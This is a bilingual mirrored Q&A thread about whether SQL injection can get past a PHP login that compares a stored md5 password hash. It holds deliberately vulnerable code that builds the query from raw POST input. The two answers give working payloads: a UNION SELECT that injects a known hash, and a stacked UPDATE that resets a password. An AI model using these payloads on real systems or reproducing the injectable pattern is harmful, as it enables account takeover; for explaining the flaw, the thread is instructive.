sql注入更改返回值
[英]sql injection change returned values
问题描述
I recently thought about something like this: 
我最近想过这样的事情:
$sql = "SELECT password FROM users WHERE user = '" . $_POST["user"] . "'";
$result = mysql_query($sql);
if (myql_num_rows($result) != 1) {
//Error
}
$data = mysql_fetch_array($result);
if ($data["password"] == md5($_POST["password"])) {
//Welcome
} else {
//Error
}
Even though no parameterized querys or atleast escaping is used, I could not think of a proper sql injection with which you can get trough to the Welcome point. 即使没有使用参数化查询或至少转义,我也想不到一个适当的sql注入,你可以通过它注入Welcome点。 You would somehow need to modify the returned password whose md5 value you can then just use as a password. 您可能需要修改返回的密码,其md5值可以用作密码。
Any ideas if this is possible? 任何想法,如果这是可能的?
2 个解决方案
解决方案1
8 已采纳 2013-01-10 14:51:27
Use the following value for User: 对用户使用以下值:
obviouslyinvalidusername' union select MD5('password123') as password --
Then a password of password123 should authenticate. 然后密码password123应该进行身份验证。 I don't know what user account you would be logged in at this point, because that part of the logic isn't shown. 我不知道此时您将登录哪个用户帐户,因为该部分逻辑未显示。
解决方案2
0 2013-01-10 14:46:32
"'; UPDATE user SET password=MD5('fakepass') where username='username'"
这会将任意密码作为md5哈希插入数据库。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.